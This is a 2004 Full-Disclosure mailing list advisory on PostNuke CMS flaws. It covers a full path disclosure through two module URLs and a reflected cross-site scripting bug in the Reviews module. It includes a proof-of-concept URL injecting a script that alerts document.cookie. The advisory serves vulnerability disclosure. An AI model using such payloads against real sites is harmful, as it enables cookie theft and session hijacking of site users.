OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
[Full-Disclosure] Multiple vulnerabilities PostNuke

From: DarkBicho (darkbichofastmail.fm)
Date: Sun Jul 18 2004 - 05:09:58 CDT


Original Advisory: http://www.swp-zone.org/archivos/advisory-10.txt

-------------------------------------------------------------------------------------------------

                            :.: Multiple vulnerabilities PostNuke :.:

  PROGRAM: PostNuke
  HOMEPAGE: http://www.postnuke.com/
  VERSION: 0.75-RC3, 0.726-3
  BUG: Multiple vulnerabilities
  DATE: 14/05/2004
  AUTHOR: DarkBicho
          web: http://www.darkbicho.tk
          team: Security Wari Proyects <www.swp-zone.org>
          Perunderforce <www.perunderforce.tk>
          Email: darkbichoperu.com
-------------------------------------------------------------------------------------------------

1.- Affected software description:
    -----------------------------

    Postnuke is a popular content management system, written in php.

2.- Vulnerabilities:
    ---------------

 A. Full path disclosure:

    This vulnerability would allow a remote user to determine the full
    path to the web root directory and other potentially sensitive
    information.

    http://localhost/html/modules/Xanthia/pnadmin.php

    Fatal error: Call to undefined function: pnmodgetvar() in
    c:\appserv\www\html\modules\xanthia\pnadmin.php on line 53

    http://localhost/html/modules/Xanthia/pnuserapi.php

    Fatal error: Call to undefined function: pnmodgetvar() in
    c:\appserv\www\html\modules\xanthia\pnuserapi.php on line 49

 B. Cross-Site Scripting aka XSS:

    Error: function showcontent()

    :.: title :

    Line 986

    --------------------------------- code
    ------------------------------------------
  
    echo "<p><span
    class=\"pn-title\"><strong><em>".pnVarPrepForDisplay($title)."
    </em></strong></span><br />";
    echo "<p align=\"justify\"><span class=\"pn-normal\">";
    if ($cover != "")

    ----------------------------------------------------------------------------------
    

3.- EXPLOIT:
    จจจจจจจ
    http://localhost/html/modules.php?op=modload&name=Reviews&file=index&req=showcontent
    &id=1&title=%253cscript>alert%2528document.cookie);%253c/script>
    

    Example:
    -------

    
    http://www.swp-zone.org/archivos/post-nuke.gif

4.- SOLUTION:
     จจจจจจจจ
    Vendors were contacted many weeks ago and plan to release a fixed
    version soon.
    Check the PostNuke website for updates and official release details.

5.- Greetings:
    ---------

    greetings to my Peruvian group swp and perunderforce :D
    "EL PISCO ES Y SERA PERUANO"

5.- Contact
    -------

    WEB: http://www.darkbicho.tk
    EMAIL: darkbichoperu.com
  
-------------------------------------------------------------------------------------------------
                                ___________ ____________
                               / _____/ \ / \______ \
                               \_____ \\ \/\/ /| ___/
                              / \\ / | |
                             /_______ / \__/\ / |____|
                             \/ \/
                       
                                Security Wari Projects
                                  (c) 2002 - 2004
                                    Made in Peru

----------------------------------------[ EOF
]----------------------------------------------
 
  
  
DarkBicho
Web: http://www.darkbicho.tk
"Mi unico delito es ver lo que otros no pueden ver"

---------------------- The End ----------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html